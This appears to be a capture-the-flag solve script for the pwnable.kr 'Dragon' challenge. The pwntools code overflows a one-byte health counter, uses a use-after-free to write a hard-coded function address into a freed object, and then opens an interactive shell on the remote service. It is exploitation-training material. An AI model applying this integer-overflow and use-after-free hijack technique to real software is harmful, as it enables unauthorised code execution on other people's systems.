Pwnable.kr Solve: Dragon
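#!/usr/bin/python
###################################
# Std imports
import sys
# Third party Imports
from pwn import *

# Binary
# Path to the local copy of the challenge binary, given on the command line.
# Fail with a usage line instead of an IndexError when it is missing.
if len(sys.argv) < 2:
    sys.exit("usage: %s <path-to-binary>" % sys.argv[0])
BINARY = sys.argv[1]

# Pwntools Binary info
# 32-bit Linux target; ROP/ELF objects are built from the local binary and
# `l` is whatever libc pwntools associates with it (e.libc).
context(os='linux', arch='i386')
r = ROP(BINARY)
e = ELF(BINARY)
l = e.libc

# Connections and interactions
# The remote endpoint is hard-coded; the commented process() line is the
# local alternative for testing against the binary on disk.
#p = process(BINARY)
p = remote("pwnable.kr", 9004)

# GDB anyone?  (only meaningful with the local process() tube above)
#gdb.attach(p)
#input("Ready to roll?")
###################################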
# Notes:
# - Dragons health is a single byte. Max is 0xff, we could overflow this so we win. (big num becomes smol num)
# - This allows us to then overwrite a previous location using a UAF since we use the same buffer which was freed.
# - The "name" field becomes the same addr location as the dragon we defeated.

# Address written into the freed dragon slot during overheal() (see steps below).
WIN = 0x08048DBF
# Placeholders kept from the original layout; nothing in this script sends them.
SHELLCODE = b""
JUNK = b""

# steps:
# 1. kill ourselves.
#    - This will malloc player, drag, free drag
# 2. Overflow the dragon, defeat dragon, overwrite former dragon with system addr.
# 3. Instead of calling PrintPlayerInfo, it will call the system instruction in secretroom.
def die(p):
    """Walk the menu through the "kill ourselves" step from the notes above.

    Three selections ("2", "1", "1") are sent in order, each preceded by
    p.clean() so buffered output from the previous prompt is discarded
    first. Returns None; the only effect is the traffic on ``p``.
    """
    for choice in ("2", "1", "1"):
        p.clean()
        p.sendline(choice)
def overheal(p):
    """Drive the fight so the dragon's one-byte health wraps, then send WIN.

    Per the author's comments: choice "1" picks the priest; each of the
    four rounds lets the dragon heal twice ("3", "3") before mana is
    restored ("2"); after the loop the packed WIN address is sent, which
    the notes above say lands in the freed dragon's slot. Returns None.
    """
    p.clean()
    p.sendline("1")
    rounds = 4
    round_actions = ("3", "3", "2")
    for _ in range(rounds):
        for action in round_actions:
            p.sendline(action)
    p.clean()
    p.sendline(p32(WIN))
# Run the two stages in the order the steps above describe, then drop into
# an interactive session on the same connection.
for stage in (die, overheal):
    stage(p)
p.interactive()